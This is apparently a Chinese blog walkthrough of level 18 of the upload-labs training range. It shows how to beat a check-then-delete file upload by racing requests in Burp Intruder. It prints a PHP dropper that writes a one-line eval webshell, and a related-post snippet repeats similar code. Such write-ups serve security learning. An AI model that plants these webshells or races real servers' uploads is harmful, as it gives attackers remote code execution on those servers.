upload靶场第十八关 条件竞争的绕过

于 2024-02-09 09:15:00 发布
阅读量471 收藏 10
点赞数 8
文章标签: web 网络 php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79650865/article/details/136084203
版权

源码分析

第一行代码是将上传文件存放到一个临时目录中

第二行是将文件从临时目录转移到服务器目录下

第三行再判断文件类型是不是白名单的合法类型,来决定是否删除文件

那么尝试在多次发送中,在网站删除之前访问非法文件。

生成小马

因为我们抓捕到的时间非常短,一句话木马需要一直链接才能一直操作,所以这里我们修改一下。

将原来的一句话木马文件进行修改,改为<?php fputs(fopen('Tony.php','w'),'<?php @eval($_POST["a"])?>');?>。意思是将一句话木马的内容写入到Tony.php这个文件之中

实验过程

上传小马文件,并用burp进行抓包

右键→send to intruder

在intruder中进行如下修改

在靶场中访问上传的木马文件

将访问木马文件的请求抓包,同样发送至intruder。按照上面的①②③④同样修改

上传请求与访问请求两边同时开始攻击

观察到upload文件夹下出现Tony.php文件时停止攻击(upload文件夹在phpstudy网站根目录下)

访问Tony.php,最后使用蚁剑连接

qiuqiumaomao
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
upload-master-pass18
diemozao8175的博客
08-18 155
第十八 限制后缀名,限制文件大小,重命名,检查文件是否存在 同样可以进行条件过滤,同17一样 用burpsuite进行爆破处理 转载于:https://www.cnblogs.com/gaonuoqi/p/11372150.html...
upload-labs 18-21 详解 (完结)
qq_53409748的博客
03-02 1036
upload-labs 18-21 详解 (完结)
upload-labs详解1-19全解(最全最详细一看就会)
热门推荐
qq_53003652的博客
04-05 2万+
upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19,每一都包含着不同上传方式。
upload-labs靶场指南(18-19
永远是少年
09-16 986
今天继续给大家介绍渗透测试相知识,本文主要内容是upload-labs靶场指南(18-19)。 一、第18 二、第19
文件上传upload-labs 第18 条件竞争
YYYYU_ZHIZZZ的博客
11-08 570
文件上传靶场练习条件竞争
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个卡,从基础...
上传文件漏洞靶场upload-labs
09-27
总的来说,`upload-labs`靶场提供了一个理想的环境,让你在安全的环境中实践和掌握上传文件漏洞相的知识,这对于提升你的Web安全技能至重要。通过深入研究和实践,你将能够更好地保护自己和他人的网站免受此类...
upload-labs-master【文件上传靶场
04-05
"upload-labs-master【文件上传靶场】" 是一个针对文件上传功能安全性的测试平台,主要目的是帮助开发者、安全人员以及爱好者检验和学习文件上传漏洞的防范措施。在这个靶场中,你可以模拟不同的攻击手段,了解如何...
国光的文件上传靶场,基于 upload-labs 定制.zip
最新发布
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
这就是 upload-labs(文件上传漏洞靶场)的价值所在。 upload-labs 是一款开源的练习 web 漏洞的靶场工具,用 PHP 代码编写而成。需要 PHP 和 Apache 环境运行。下面我们将详细介绍如何在 PHP、Apache 环境中部署 ...
文件上传靶场upload-labs通
p36273的博客
07-03 2710
upload-labs是一个专门用来练习文件上传的靶场一共20,现在,我们开始通吧。
upload-labs18
qq_46527080的博客
12-25 2350
漏洞介绍 条件竞争漏洞是一种服务器端的漏洞,是由于开发者设计应用程序并发处理时操作逻辑不合理而造成。当应用面临高并发的请求时未能同步好所有请求,导致请求与请求之间产生等待时出现逻辑缺陷。该漏洞一般出现在与数据库系统频繁交互的位置,例如金额同步、支付等较敏感操作处。另外条件竞争漏洞也会出现在其他位置,例如文件的操作处理等。 首先将文件上传到服务器,然后检测文件后缀名,如果不符合条件,就删掉,典型的“引狼入室”。 第十八条件竞争) 源码分析 首先准备一个创建shell的php <?php fputs
upload-labs之第十七和十八
田田云逸的博客
10-28 2054
Pass17 打开第十七,通过提示发现跟以前的都不一样。 看来是需要进行代码审计了,那么来看看源码吧 $is_upload = false;$msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_n.
Upload-labs 18 条件竞争——通
W小哥
01-13 4088
访问目标站点,提示上传图片马 查看源码 思路:上传shell.php.7z图片木马配合解析漏洞 实验步骤: 图片中php一句话木马代码:<?php fputs(fopen('shell2.php','w'),'<?php @eval($_POST["x"])?>’);?> 第一种:使用python脚本 第一步:burpsuite抓包,上传文件名字shell.php.7z...
upload-labs通总结 | 那些年踩过的坑
m0_56691564的博客
10-31 1377
本文就是简单总结一下upload-lab通方法和踩过的坑,参考的通教程放在文末,需要的小伙伴去看~
uplode文件上传漏洞 18-20
TGFXK的博客
04-22 2543
目录 第十八:解析漏洞 第十九:(/.) 第二十:白名单+构造数组绕过 第十八:解析漏洞 原理:白名单允许7z文件(前期检测),但阿帕奇不能解析这个格式,所以把文件当作php解析 卡源码: //index.php $is_upload = false; $msg = null; if (isset($_POST['submit'])) { require_once("./myupload.php"); $imgFileName =time(); $u
upload-labs 18
LuckySec
11-09 1383
题目 查看代码 分析,本对文件后缀名做了白名单判断, 然后一步一步检查文件大小、文件是否存在等等, 将文件上传后,对文件重新命名 同样存在条件竞争的漏洞。 不断利用burp发送上传图片马的数据包,由于条件竞争, 程序会出现来不及rename的问题,从而上传成功 ...
upload-labs】————18、Pass-17
Fly_鹏程万里
08-15 677
查看源代码: 竞争条件:这里先将文件上传到服务器,然后通过rename修改名称,再通过unlink删除文件,因此可以通过条件竞争的方式在unlink之前,访问webshell。 首先在burp中不断发送上传webshell的数据包 之后不断在浏览器中刷新,刷新,在刷新。。。。。,你会看到下面的结果: ...
upload-labs通攻略教程二【12-18
m0_55854679的博客
06-05 1496
upload-labs通攻略教程一(01-11) Pass-12-(白名单验证,get型00截断) 查看题目源码 白名单判断,只允许三中文件类型。strrpos(string,find,start)函数查找字符串中最后一次出现的位置,这里是将后缀名提取赋值给file_exit.但$img_path是直接拼接,我们可以通过抓包修改get参数,然后通过file_ext无效,这样就可以上传php文件因此可以利用%00截断绕过。 %00截断的概念和原理: 在url中%00表示ASCll码中的0,而0作为特殊
upload-labs 第十八
08-23
upload-labs 第十八是一个文件上传的挑战。 在这个挑战中,你需要通过绕过一系列的安全措施来成功上传恶意文件。首先,上传的文件需要是一个图片文件,而不能是其他类型的文件。其次,你还需要绕过服务器对文件...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值